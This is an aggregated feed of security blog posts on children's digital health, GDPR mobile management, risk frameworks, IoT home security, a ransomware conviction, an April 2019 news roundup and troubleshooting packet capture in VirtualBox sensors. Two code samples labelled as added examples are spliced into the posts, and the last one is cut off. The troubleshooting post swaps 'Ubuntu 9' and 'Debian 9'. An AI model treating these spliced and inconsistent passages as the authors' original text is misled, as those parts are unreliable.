My morning walk route takes me past a school that usually has its assembly at 7:00 am. I catch glimpses of students praying, reading out the news, teachers giving talks and often stop to watch them do their morning drill. It’s an arresting sight – 500 kids in bright uniforms moving in a synchronized manner to drumbeats. The school is doing it right; light exercises before the start of the academic day help to enhance positivity, concentration power, alertness and readiness to learn. After all it’s an age-old saying, ‘A healthy mind resides in a healthy body.’

Perhaps you are wondering why McAfee Cybermum is discussing health. Well, 7th April was World Health Day and what better time than this to have a heart-to-heart on good health, especially, good digital health?

Let’s accept it- we are parents, first and foremost, and our focus is always (even when we are sleeping or partying or just chilling) on our kids. All we want is to raise happy, well-adjusted kids who will be able to think rationally and act for themselves and know how to stay safe- both in the real and in the digital world.

When we were kids, outdoors was the place to be! Life centered around our gardens, parks and roads outside our houses; where we spent hours playing, chatting or just hanging around. Today’s digital kids also play and socialize a lot, but the bulk of it happens online. They have their favourite hanging out zones, gaming sites, digital libraries, social media etc. We all are quite tech-savvy and so, we are well aware how addictive digital activities can be as well as how the long hours spent online can have adverse effects on health and mind. This is why we worry when our kids prefer digital lives to the real one; we take measures like setting device-use rules and see red if the rules are breached.

But losing our cool isn’t the solution- we need to promote a balanced digital life, right from the day the little tykes mark their initiation into the digital world and educate them and act as their digital role models.

Here’s how you can ensure a healthy digital life for your kids:

Health is wealth

Play games, swim, run, exercise, go for treks! It’s also a good opportunity to show them that devices can be put to other uses besides gaming and socializing, viz; tracking activity and monitoring health statistics. When they are using devices, teach them the right postures so that they don’t strain their back or eyes.

Balance is the keyword

Often, we forget to practice what we preach- which, in this case, is to have some device-free hours. Keep your device away (a) when with family, (b) when there’s company, and (c) during bedtime. Children will protest and perhaps bawl, but will also learn a valuable lesson, rather two lessons – There are other sources of entertainment besides devices, and a NO means NO. While the first lesson is important to lead a balanced digital life, the second one is important for them in the real world too.

Fix up an activity schedule that includes household chores

Not only will this help to maintain digital balance, it will also give the child the first lesson in responsibility. Whether it is making their own beds, cleaning out their wardrobes or helping to wash the car or set the table, these are values you are teaching kids non-verbally. Even little tykes can do small tasks and trust me, it will make them feel proud. Just take care that the daily timetable doesn’t start resembling an army cadet’s training schedule.

Set clear-cut rules

This helps kids learn discipline. Stress how excessive use is akin to misuse. Their daily schedule should specify timings for device use. If they breach the timings, bring it up immediately. Repeated breaches need to be tackled firmly. Maybe the privilege of using the device needs to be surrendered for a few days. This, you as a parent need to decide.

Let them know you will be remotely monitoring their activities

It’s recommended that you mentor kids in the digital world till they are mature enough to handle matters responsibly themselves. Use parental controls that come with comprehensive security tools like McAfee Total Protection or McAfee LiveSafe and keep the admin password a secret. BUT LET YOUR KIDS KNOW you would be supervising them online. Explain it’s similar to how you keep an eye on them at public places. Remember to set internet timings and filters.

Have purposeful family activity time

Use that evening hour before or after dinner to chat, play board games, tell stories or discuss the news. Share, play, connect- the perfect ingredients for a close-knit family! And of course, all devices, including the digital assistant, are off-limits during this time.

Teach kids to be upstanders

Online abuse can lead to emotional disturbances in vulnerable kids. Even adults are negatively affected by cyberbullying and trolling and so you can understand the impact of such behavior on kids. Give your kids the security of your love and trust so that they grow up to be strong and confident and can stand up against bullies.

Discuss cybersafety often and with due seriousness

Living in the connected age, where we all use the same router for our devices along with other smart devices like CCTV, digital assistants etc., it is important to reinforce how the carelessness of one can affect the safety and privacy of all other family members. A safe and secure net connection is needed for mental wellness.

So, what are you waiting for? Start working on your family’s digital health today!

The post On World Health Day, Give Your Children the Key to Good Digital Health appeared first on McAfee Blogs.

Seqrite MobiSMART for GDPR Compliance

Estimated reading time: 2 minutes

It has been almost a year since the General Data Protection Regulation (GDPR) came into effect. A landmark piece of legislation in the history of data protection, GDPR has changed the way enterprises approach cybersecurity. With its many definitions and its focus on data protection and security, enterprises that handle data belonging to EU citizens have to be much more proactive about complying with the legislation.

Non-compliance can have very steep financial consequences, with penalties ranging up to 20 million Euros or 4% of a company’s annual turnover, whichever is higher. Organizations must therefore concentrate on endpoint management that is sufficient to fortify the security of their Enterprise Mobility Management (EMM) and Mobile Device Management (MDM) systems.

An enterprise’s mobile workforce occupies the far reaches of the security perimeter and constitutes the most vulnerable threat vectors to the data protected by GDPR. That is why organizations can consider Seqrite MobiSMART, a powerful tool to secure control of critical data, to remain compliant with GDPR regulations.

Take control of your data – A key feature through which Seqrite MobiSMART can help with GDPR compliance is by offering an unhindered, easy access to data consumption in your enterprise. This can be through the single console management for all devices which offers a one-stop view into how data is being consumed in your enterprise.

Fencing and Data Monitoring – GDPR puts great importance on the distinction between personal and official data. MobiSMART offers an easy way to maintain that distinction through its fencing and data monitoring features, which allow digital boundaries to be defined. Data usage can easily be monitored across mobile and Wi-Fi networks.

Built-in mobile security – MobiSMART’s built-in security features help you keep your devices secure and ensure you will not fall foul of GDPR’s compliance requirements. With best-in-class anti-malware, strong anti-theft features and excellent web security, enterprises will know that their cybersecurity issues are in safe hands.

Keep control of your apps – Applications can often have malicious consequences but MobiSMART allows enterprises to stay in control of applications. Apps can be pushed from server to mobile devices with administrators possessing the ability to blacklist certain apps. Custom applications can also be pushed to the Enterprise App Store.

For those of you still struggling with enterprise-wide visibility to user activity, Seqrite MobiSMART can be a trusted resource for providing a viable and fully-functioning app workspace for your mobile workforce that’s NIST-certified secure.

The post Seqrite MobiSMART for GDPR Compliance appeared first on Seqrite Blog.

What you don’t know may (pleasantly) surprise you

Today I find myself in Louisville, KY performing a privacy assessment for a client. When visiting clients to perform an assessment, I meet with team members from all parts of the organization. Usually, I am accompanied by someone from the privacy office or legal team. Frequently, my escorts learn something new about the business and […]

The post What you don’t know may (pleasantly) surprise you appeared first on Privacy Ref Blog.

Cyber Security: Three Parts Art, One Part Science

As I reflect upon my almost 40 years as a cyber security professional, I think of the many instances where the basic tenets of cyber security—those we think have common understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning, and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”

There is quite a bit of subjectivity in the cyber security business. One auditor will look at evidence and agree you are in compliance; another will say you are not. If you are going to protect sensitive information, do you encrypt it, obfuscate it, or segment it off and place it behind very tight identification and access controls before allowing users to access the data? Yes. As we advise our client base, it is essential that we have all the context necessary to make good risk-based decisions and recommendations.

Let’s talk about Connection’s artistic methodology. We start with a canvas that has the core components of cyber security: protection, detection, and reaction. By addressing each of these three pillars in a comprehensive way, we ensure that the full conversation around how people, process, and technology all work together to provide a comprehensive risk strategy is achieved.

Protection:

People
Users understand threat and risk, and know what role they play in the protection strategy. For example, if you see something, say something. Don’t let someone surf in behind you through a badge check entry. And don’t think about trying to shut off your end-point anti-virus or firewall.

Process
Policies are established, documented, and socialized. For example, personal laptops should never be connected to the corporate network. Also, don’t send sensitive information to your personal email account so you can work from home.

Technology
Some examples of the barriers used to deter attackers and breaches are edge security with firewalls, intrusion detection and prevention, sandboxing, and advanced threat detection.

Detection:

The average mean time to identify an active incident in a network is 197 days. The mean time to contain an incident is 69 days.

People
Incident response teams need to be identified and trained, and all employees need to be trained on the concept of “if you see something, say something.” Detection is a proactive process.

Process
What happens when an alert occurs? Who sees it? What is the documented process for taking action?

Technology
What is in place to ensure you are detecting malicious activity? Is it configured to ignore noise and only alert you of a real event? Will it help you bring that 197-day mean time to detection way down?

Reaction:

People
What happens when an event occurs? Who responds? How do you recover? Does everyone understand their role? Do you War Game to ensure you are prepared WHEN an incident occurs?

Process
What is the documented process to reduce the Kill Chain—the mean time to detect and contain—from 69 days to 69 minutes? Do you have a Business Continuity and Disaster Recovery Plan to ensure the ability to react to a natural disaster, significant cyber breach such as ransomware, DDoS, or—dare I say it—a pandemic?

Technology
What cyber security consoles have been deployed that allow quick access to patch a system, change a firewall rule, switch ACL, or policy setting at an end point, or track a security incident through the triage process?
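To show how the 197-day and 69-day figures above are actually measured, here is an added example (not Connection's code or methodology) that computes mean time to identify and mean time to contain from constructed incident records and flags incidents that miss a program's own targets; the incident names and dates are made up.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import mean


@dataclass(frozen=True)
class Incident:
    """One incident record as a response team would log it (constructed)."""
    name: str
    first_activity: datetime   # earliest evidence of attacker activity on the network
    detected: datetime         # when the activity was identified as a real incident
    contained: datetime        # when the attacker's access was cut off


def time_to_identify(inc: Incident) -> timedelta:
    """Dwell time: how long the attacker was active before anyone noticed."""
    return inc.detected - inc.first_activity


def time_to_contain(inc: Incident) -> timedelta:
    """How long it took from identification to containment."""
    return inc.contained - inc.detected


def mean_delta(deltas) -> timedelta:
    return timedelta(seconds=mean(d.total_seconds() for d in deltas))


def response_metrics(incidents):
    """Mean and worst-case time to identify and to contain across a set of incidents."""
    tti = [time_to_identify(i) for i in incidents]
    ttc = [time_to_contain(i) for i in incidents]
    return {
        "mean_time_to_identify": mean_delta(tti),
        "mean_time_to_contain": mean_delta(ttc),
        "worst_time_to_identify": max(tti),
        "worst_time_to_contain": max(ttc),
    }


def missed_targets(incidents, identify_target: timedelta, contain_target: timedelta):
    """Incidents that blew past the targets the program has set, keyed by name."""
    misses = {}
    for inc in incidents:
        failed = []
        if time_to_identify(inc) > identify_target:
            failed.append("identify")
        if time_to_contain(inc) > contain_target:
            failed.append("contain")
        if failed:
            misses[inc.name] = failed
    return misses


# Constructed records. The first reproduces the averages quoted in the text
# (197 days to identify, 69 days to contain); the second shows a team that
# identified a phish within the hour and hit a 69-minute containment target.
INCIDENTS = [
    Incident("ransomware-2018-12",
             datetime(2018, 6, 1), datetime(2018, 12, 15), datetime(2019, 2, 22)),
    Incident("phished-creds-2019-03",
             datetime(2019, 3, 4, 9, 0), datetime(2019, 3, 4, 9, 30), datetime(2019, 3, 4, 10, 39)),
]

if __name__ == "__main__":
    for key, value in response_metrics(INCIDENTS).items():
        print(f"{key}: {value}")
    print("missed targets:", missed_targets(INCIDENTS, timedelta(days=1), timedelta(minutes=69)))
```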

All of these things are important to create a comprehensive InfoSec Program. The science is the technology that will help you build a layered, in-depth defense approach. The art is how to assess the threat, define and document the risk, and create a strategy that allows you to manage your cyber risk as it applies to your environment, users, systems, applications, data, customers, supply chain, third party support partners, and business process.

More Art: Are You a Risk Avoider or Risk Transference Expert?

A better way to state that is, “Do you avoid all risk responsibility or do you give your risk responsibility to someone else?” Hint: I don’t believe in risk avoidance or risk transference.

Yes, there is an art to risk management. There is also science if you use, for example, the Carnegie Mellon risk tools. But a good risk owner and manager documents risk, prioritizes it by risk criticality, turns it into a risk register or roadmap plan, remediates what is necessary, and accepts what is reasonable from a business and cyber security perspective. Oh, by the way, those same five cyber security professionals we talked about earlier? They have 17 definitions of risk.

As we wrap up this conversation, let’s talk about the importance of selecting a risk framework. It’s kind of like going to a baseball game and recognizing that the program helps you know the players and the stats. What framework will you pick? Do you paint in watercolors or oils? Are you a National Institute of Standards and Technology (NIST) artist, an International Organization for Standardization (ISO) artist, or have you developed your own framework like the Nardone puzzle chart? I developed this several years ago when I was the CTO/CSO of the Commonwealth of Massachusetts. It has been artistically enhanced over the years to incorporate more security components, but it is loosely based on the NIST 800-53 and ISO 27001 standards.

When it comes to selecting a security framework as a CISO, I lean towards the NIST Cyber Security Framework (CSF) pictured below. This framework is comprehensive, and provides a scoring model that allows risk owners to measure and target what risk level they believe they need to achieve based on their business model, threat profile, and risk tolerance. It has five functional focus areas. The ISO 27001 framework is also a very solid and frequently used model. Both of these frameworks can result in a Certificate of Attestation demonstrating adherence to the standard. Many commercial corporations do an annual ISO 27001 assessment for that very reason. More and more are leaning towards the NIST CSF, especially commercial corporations doing work with the government.

The art in cyber security is in the interpretation of the rules, standards, and requirements that are primarily based on a foundation in science in some form. The more experience one has in the cyber security industry, the more effective the art becomes. As a last thought, keep in mind that Connection’s Technology Solutions Group Security Practice has over 150 years of cyber security expertise on tap to apply to that art.

The post Cyber Security: Three Parts Art, One Part Science appeared first on Connected.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating into almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that doesn’t contain some form of smart device. From digital assistants to smart plugs, more endpoints mean more avenues bad actors can use to reach home networks. As recently as 2018, virtual assistants, smart TVs, and even smart plugs that appeared secure were found to have security flaws under the surface that could let bad actors expose home networks in the future, while other IoT devices, such as an IoT thermometer and home Wi-Fi routers, were actually used to conduct botnet attacks.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in an advanced internet router with built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

UK hacker jailed for six years for blackmailing pornography site users

Zain Qaiser targeted millions of computers with ransomware demanding large sums

A hacker who blackmailed users of pornography websites in what investigators say is the UK’s most serious cybercrime case has been jailed for six years and five months.

Zain Qaiser targeted millions of computers with malicious browser-locking software that demanded payment of up to $1,000 (£765) to unfreeze screens, Kingston crown court heard.

Continue reading...

Security roundup: April 2019

We round up interesting research and reporting about security and privacy from around the web. This month: healthy GDPR, gender rebalance, cookie walls crumble, telecom threats and incident response par excellence.

A healthy approach to data protection

Ireland’s Department of Health is now considering amendments to the Health Research Regulations, with data protection as one of the areas under review. The Health Research Consent Declaration Committee, which was formed as part of the Health Research Regulations made under GDPR, confirmed the possible amendments in a statement on its website.

GDPR triggered significant changes to health research because of the obligations on data protection impact assessments. Our senior data protection consultant Tracy Elliott has blogged about this issue.

The newly announced engagement process may lead to changes to the Health Research Regulations “where any such amendments are sound from a policy perspective and legally feasible”, the HRCDC said. There’s a link to a more detailed statement on the proposed amendments at this link.

A welcome improvement

Women now make up almost a quarter of information security workers, according to new figures from ISC(2). For years, female participation in security roles hovered around the 10-11 per cent mark. The industry training and certification group’s latest statistics show that figure is much higher than was generally thought.

Some of this increase is due to the group widening its parameters beyond pure cybersecurity roles. The full report shows that higher percentages of women security professionals are attaining senior roles. This includes chief technology officer (7 per cent of women vs. 2 per cent of men), vice president of IT (9 per cent vs. 5 per cent), IT director (18 per cent vs. 14 per cent) and C-level or executive (28 per cent vs. 19 per cent).

“While men continue to outnumber women in cybersecurity and pay disparity still exists, women in the field are buoyed by higher levels of education and certifications, and are finding their way to leadership positions in higher numbers,” ISC(2) said.

The trends are encouraging for any girls or women who are considering entering the profession; as the saying goes, if you can see it, you can be it. (The report’s subtitle is ‘young, educated and ready to take charge’.) After the report was released, Kelly Jackson Higgins at Dark Reading tweeted a link to her story from last year about good practice for recruiting and retaining women in security.

Great walls of ire

You know those annoying website pop-ups that ask you to accept cookies before reading further? They’re known as cookie walls or tracker walls, and the Dutch data protection authority has declared that they violate the General Data Protection Regulation. If visitors can’t access a website without first agreeing to be tracked, they are being forced to share their data. The argument is that this goes against the principle of consent, since the user has no choice but to agree if they want to access the site.

Individual DPAs have taken different interpretations on GDPR matters. SC Magazine quoted Omar Tene of the International Association of Privacy Professionals, who described the Dutch approach as “restrictive”.

This might be a case of GDPR solving a problem of its own making: The Register notes that cookie consent notices showed a massive jump last year, from 16 per cent in January to 62.1 per cent by June.

Hanging on the telephone

Is your organisation’s phone system in your threat model? New research from Europol’s European Cybercrime Centre and Trend Micro lifts the lid on network-based telecom fraud and infrastructure attacks. The Cyber-Telecom Crime Report includes case studies of unusual attacks to show how they work in the real world.

By accessing customers’ or carriers’ accounts, criminals have a low-risk alternative to traditional forms of financial fraud. Among the favoured tactics are vishing, which is a voice scam designed to trick people into revealing personal or financial information over the phone. ‘Missed call’ scams, also known as Wangiri, involve calling a number once; when the recipient calls back, thinking it’s a genuine call, they connect to a premium rate number. The report includes the eye-watering estimate that criminals make €29 billion per year from telecom fraud.

Trend Micro’s blog takes a fresh angle on the report findings, focusing on the risks to IoT deployments and to the arrival of 5G technology. The 57-page report is free to download from this link. Europol has also launched a public awareness page about the problem.  

From ransom to recovery

Norsk Hydro, one of the world’s largest aluminium producers, unexpectedly became a security cause célèbre following a “severe” ransomware infection. After the LockerGoga variant encrypted data on the company’s facilities in the US and Europe, the company shut its global network, switched to manual operations at some of its plants, and stopped production in others.

Norsk Hydro said it planned to rely on its backups rather than paying the ransom. Through it all, the company issued regular updates, drawing widespread praise for its openness, communication and preparedness. Brian Honan wrote: “Norsk Hydro should be a case study in how to run an effective incident response. They were able to continue their business, although at a lower level, in spite of their key systems being offline. Their website contains great examples of how to provide updates to an issue and may serve as a template for how to respond to security breaches.”

Within a week, most of the company’s operations were back running at capacity. Norsk Hydro has released a video showing how it was able to recover. Other victims weren’t so lucky. F-Secure has a good analysis of the ransomware that did the damage, as does security researcher Kevin Beaumont.

Links we liked

Remember the Melissa virus? Congratulations, you’re old: that was 20 years ago. MORE

New trends in spam and phishing, whose popularity never seems to fade. MORE and MORE

For parents and guardians: videos to spark conversations with kids about online safety. MORE

A look behind online heists on Mexican banks that netted perpetrators nearly $20 million. MORE

While we’re on the subject, more cybercriminal tactics used against financial institutions. MORE

This is a useful high-level overview of the NIST cybersecurity framework. MORE

This campaign aims to hold tech giants to account for fixing security and privacy issues. MORE

How can security awareness programmes become more effective at reducing risk? MORE

An excellent security checklist for devices and accounts, courtesy of Bob Lord. MORE

Shodan Monitor alerts organisations when their IoT devices become exposed online. MORE

The post Security roundup: April 2019 appeared first on BH Consulting.

Troubleshooting NSM Virtualization Problems with Linux and VirtualBox

I spent a chunk of the day troubleshooting a network security monitoring (NSM) problem. I thought I would share the problem and my investigation in the hopes that it might help others. The specifics are probably less important than the general approach.

It began with ja3. You may know ja3 as a set of Zeek scripts developed by the Salesforce engineering team to profile client and server TLS parameters.

I was reviewing Zeek logs captured by my Corelight appliance and by one of my lab sensors running Security Onion. I had coverage of the same endpoint in both sensors.

I noticed that the SO Zeek logs did not have ja3 hashes in the ssl.log entries. Both sensors did have ja3s hashes. My first thought was that SO was misconfigured somehow to not record ja3 hashes. I quickly dismissed that, because it made no sense. Besides, verifying that intuition required me to start troubleshooting near the top of the software stack.

I decided to start at the bottom, or close to the bottom. I had a sinking suspicion that, for some reason, Zeek was only seeing traffic sent from remote systems, and not traffic originating from my network. That would account for the creation of ja3s hashes, for traffic sent by remote systems, but not ja3 hashes, as Zeek was not seeing traffic sent by local clients.

I was running SO in VirtualBox 6.0.4 on Ubuntu 18.04. I started sniffing TCP network traffic on the SO monitoring interface using Tcpdump. As I feared, it didn't look right. I ran a new capture with filters for ICMP and a remote IP address. On another system I tried pinging the remote IP address. Sure enough, I only saw ICMP echo replies, and no ICMP echoes. Oddly, I also saw doubles and triples of some of the ICMP echo replies. That worried me, because unpredictable behavior like that could indicate some sort of software problem.

My next step was to "get under" the VM guest and determine if the VM host could see traffic properly. I ran Tcpdump on the Ubuntu 18.04 host on the monitoring interface and repeated my ICMP tests. It saw everything properly. That meant I did not need to bother checking the switch span port that was feeding traffic to the VirtualBox system.
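The host-versus-guest tcpdump comparison above can be turned into a repeatable check. The following is an added example, not code from the original post, that parses constructed tcpdump ICMP lines (documentation-range addresses and a made-up echo id) and reports whether only one side of the echo exchange is visible and which packets appear more than once.

```python
import re
from collections import Counter

# Matches the one-line summary tcpdump prints for ICMP echo traffic
# (timestamp, "IP src > dst:", request/reply, id, seq). Other lines are ignored.
ICMP_ECHO_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo (?P<kind>request|reply), id (?P<id>\d+), seq (?P<seq>\d+)"
)


def parse_icmp_echo(lines):
    """Return one dict per parsed ICMP echo line; non-matching lines are dropped."""
    packets = []
    for line in lines:
        m = ICMP_ECHO_RE.match(line.strip())
        if m:
            pkt = m.groupdict()
            pkt["id"] = int(pkt["id"])
            pkt["seq"] = int(pkt["seq"])
            packets.append(pkt)
    return packets


def analyze_capture(lines):
    """Summarise whether a capture shows both directions of an echo exchange."""
    packets = parse_icmp_echo(lines)
    kinds = Counter(p["kind"] for p in packets)
    # The same direction + id + seq seen more than once: the doubles and
    # triples that point at a capture-path problem rather than real traffic.
    occurrences = Counter((p["kind"], p["id"], p["seq"]) for p in packets)
    duplicates = {key: n for key, n in occurrences.items() if n > 1}
    requests = {(p["id"], p["seq"]) for p in packets if p["kind"] == "request"}
    replies = {(p["id"], p["seq"]) for p in packets if p["kind"] == "reply"}
    if requests and replies:
        verdict = "both directions visible"
    elif replies:
        verdict = "one-sided: only echo replies seen (traffic from the local side is missing)"
    elif requests:
        verdict = "one-sided: only echo requests seen (traffic from the remote side is missing)"
    else:
        verdict = "no ICMP echo traffic parsed"
    return {
        "requests": kinds["request"],
        "replies": kinds["reply"],
        "unanswered": sorted(requests - replies),   # requests with no matching reply
        "unsolicited": sorted(replies - requests),  # replies whose request was never seen
        "duplicates": duplicates,
        "verdict": verdict,
    }


# Constructed tcpdump output; 192.0.2.20 pings 203.0.113.7 (documentation ranges).
GUEST_CAPTURE = [  # what the sensor VM saw: replies only, some of them repeated
    "10:00:01.000100 IP 203.0.113.7 > 192.0.2.20: ICMP echo reply, id 4321, seq 1, length 64",
    "10:00:02.000200 IP 203.0.113.7 > 192.0.2.20: ICMP echo reply, id 4321, seq 2, length 64",
    "10:00:02.000210 IP 203.0.113.7 > 192.0.2.20: ICMP echo reply, id 4321, seq 2, length 64",
    "10:00:03.000300 IP 203.0.113.7 > 192.0.2.20: ICMP echo reply, id 4321, seq 3, length 64",
    "10:00:03.000310 IP 203.0.113.7 > 192.0.2.20: ICMP echo reply, id 4321, seq 3, length 64",
    "10:00:03.000320 IP 203.0.113.7 > 192.0.2.20: ICMP echo reply, id 4321, seq 3, length 64",
]
HOST_CAPTURE = [  # what the hypervisor host saw on the same span feed
    "10:00:01.000000 IP 192.0.2.20 > 203.0.113.7: ICMP echo request, id 4321, seq 1, length 64",
    "10:00:01.000100 IP 203.0.113.7 > 192.0.2.20: ICMP echo reply, id 4321, seq 1, length 64",
    "10:00:02.000000 IP 192.0.2.20 > 203.0.113.7: ICMP echo request, id 4321, seq 2, length 64",
    "10:00:02.000200 IP 203.0.113.7 > 192.0.2.20: ICMP echo reply, id 4321, seq 2, length 64",
    "10:00:03.000000 IP 192.0.2.20 > 203.0.113.7: ICMP echo request, id 4321, seq 3, length 64",
]

if __name__ == "__main__":
    for label, capture in (("guest", GUEST_CAPTURE), ("host", HOST_CAPTURE)):
        print(label, analyze_capture(capture))
```

Feeding the script a real capture is a matter of piping `tcpdump -n -l icmp` output into it; a "one-sided" verdict on the guest with "both directions visible" on the host localises the problem between hypervisor and VM, as in the post.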

It seemed I had a problem somewhere between the VM host and guest. On the same VM host I was also running an instance of RockNSM. I ran my ICMP tests on the RockNSM VM and, sadly, I got the same one-sided traffic as seen on SO.

Now I was worried. If the problem had only been present in SO, then I could fix SO. If the problem was present in both SO and RockNSM, then the problem had to be with VirtualBox -- and I might not be able to fix it.

I reviewed my configurations in VirtualBox, ensuring that the "Promiscuous Mode" under the Advanced options was set to "Allow All". At this point I worried that there was a bug in VirtualBox. I did some Google searches and reviewed some forum posts, but I did not see anyone reporting issues with sniffing traffic inside VMs. Still, my use case might have been weird enough to not have been reported.

I decided to try a different approach. I wondered if running VirtualBox with elevated privileges might make a difference. I did not want to take ownership of my user VMs, so I decided to install a new VM and run it with elevated privileges.

Let me stop here to note that I am breaking one of the rules of troubleshooting. I'm introducing two new variables, when I should have introduced only one. I should have built a new VM but run it with the same user privileges with which I was running the existing VMs.

I decided to install a minimal edition of Ubuntu 9, with VirtualBox running via sudo. When I started the VM and sniffed traffic on the monitoring port, lo and behold, my ICMP tests revealed both sides of the traffic as I had hoped. Unfortunately, from this I erroneously concluded that running VirtualBox with elevated privileges was the answer to my problems.

I took ownership of the SO VM in my elevated VirtualBox session, started it, and performed my ICMP tests. Womp womp. Still broken.

I realized I needed to separate the two variables that I had entangled, so I stopped VirtualBox, and changed ownership of the Debian 9 VM to my user account. I then ran VirtualBox with user privileges, started the Debian 9 VM, and ran my ICMP tests. Success again! Apparently elevated privileges had nothing to do with my problem.

By now I was glad I had not posted anything to any user forums describing my problem and asking for help. There was something about the monitoring interface configurations in both SO and RockNSM that resulted in the inability to see both sides of traffic (and avoid weird doubles and triples).

I started my SO VM again and looked at the script that configured the interfaces. I commented out all the entries below the management interface as shown below.

$ cat /etc/network/interfaces

# This configuration was created by the Security Onion setup script.
#
# The original network interface configuration file was backed up to:
# /etc/network/interfaces.bak.
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# loopback network interface
auto lo
iface lo inet loopback

# Management network interface
auto enp0s3
iface enp0s3 inet static
  address 192.168.40.76
  gateway 192.168.40.1
  netmask 255.255.255.0
  dns-nameservers 192.168.40.1
  dns-domain localdomain

#auto enp0s8
#iface enp0s8 inet manual
#  up ip link set $IFACE promisc on arp off up
#  down ip link set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done
#  post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6

#auto enp0s9
#iface enp0s9 inet manual
#  up ip link set $IFACE promisc on arp off up
#  down ip link set $IFACE promisc off down
#  post-up ethtool -G $IFACE rx 4096; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done
#  post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6

I rebooted the system and brought the enp0s8 interface up manually using this command:

$ sudo ip link set enp0s8 promisc on arp off up

Fingers crossed, I ran my ICMP sniffing tests, and voila, I saw what I needed -- traffic in both directions, without doubles or triples no less.

So, there appears to be some sort of problem with the way SO and RockNSM set parameters for their monitoring interfaces, at least as far as they interact with VirtualBox 6.0.4 on Ubuntu 18.04. You can see in the network script that SO disables a bunch of NIC options. I imagine one or more of them is the culprit, but I didn't have time to work through them individually.

I tried taking a look at the network script in RockNSM, but it runs CentOS, and I'll be darned if I can't figure out where to look. I'm sure it's there somewhere, but I didn't have the time to figure out where.

The moral of the story is that I should have immediately checked after installation that both SO and RockNSM were seeing both sides of the traffic I expected them to see. I had taken that for granted for many previous deployments, but something broke recently and I don't know exactly what. My workaround will hopefully hold for now, but I need to take a closer look at the NIC options because I may have introduced another fault.

A second moral is to be careful of changing two or more variables when troubleshooting. When you do that you might fix a problem, but not know what change fixed the issue.
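The post-installation check the first moral calls for can be scripted. The following is an added example, not code from the original post or from Security Onion or RockNSM: it runs the same ICMP test described above against a monitoring interface and parses the tcpdump output, reporting whether both echo requests and echo replies were seen and whether any frame was captured more than once. The interface name, IP addresses and the two captured samples embedded in the script are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original post: verify that a sniffing interface
# sees BOTH directions of ICMP and flag duplicated frames, which is the
# symptom described above (only echo replies, some of them doubled).
# Interface name, IP addresses and the sample lines below are constructed.

# check_capture reads "tcpdump -nn -l" lines on stdin and prints one verdict:
#   ok                     echo requests and replies seen, no repeats
#   one-sided              only one direction captured
#   duplicates             the same packet (timestamp ignored) seen twice
#   one-sided,duplicates   both problems at once
check_capture() {
    awk '
        BEGIN { req = 0; rep = 0; dup = 0 }
        /ICMP echo request/ { req++ }
        /ICMP echo reply/   { rep++ }
        {
            # drop the leading timestamp so repeated frames compare equal
            line = $0
            sub(/^[^ ]+ /, "", line)
            if (++seen[line] > 1) dup = 1
        }
        END {
            v = ""
            if (req == 0 || rep == 0) v = "one-sided"
            if (dup) v = (v == "" ? "duplicates" : v ",duplicates")
            if (v == "") v = "ok"
            print v
        }'
}

# check_interface IFACE REMOTE_IP: live check (needs tcpdump and root, e.g. via sudo).
# Ping REMOTE_IP from another host on the monitored segment while it runs;
# -c 10 bounds the capture so the function returns, -nn avoids DNS lookups.
check_interface() {
    tcpdump -nn -l -i "$1" -c 10 "icmp and host $2" 2>/dev/null | check_capture
}

# Constructed tcpdump output for a healthy capture (both directions, no repeats).
SAMPLE_OK='12:00:01.000001 IP 192.168.40.50 > 192.168.40.1: ICMP echo request, id 1234, seq 1, length 64
12:00:01.000300 IP 192.168.40.1 > 192.168.40.50: ICMP echo reply, id 1234, seq 1, length 64
12:00:02.000002 IP 192.168.40.50 > 192.168.40.1: ICMP echo request, id 1234, seq 2, length 64
12:00:02.000310 IP 192.168.40.1 > 192.168.40.50: ICMP echo reply, id 1234, seq 2, length 64'

# Constructed output reproducing the broken VM: replies only, one of them twice.
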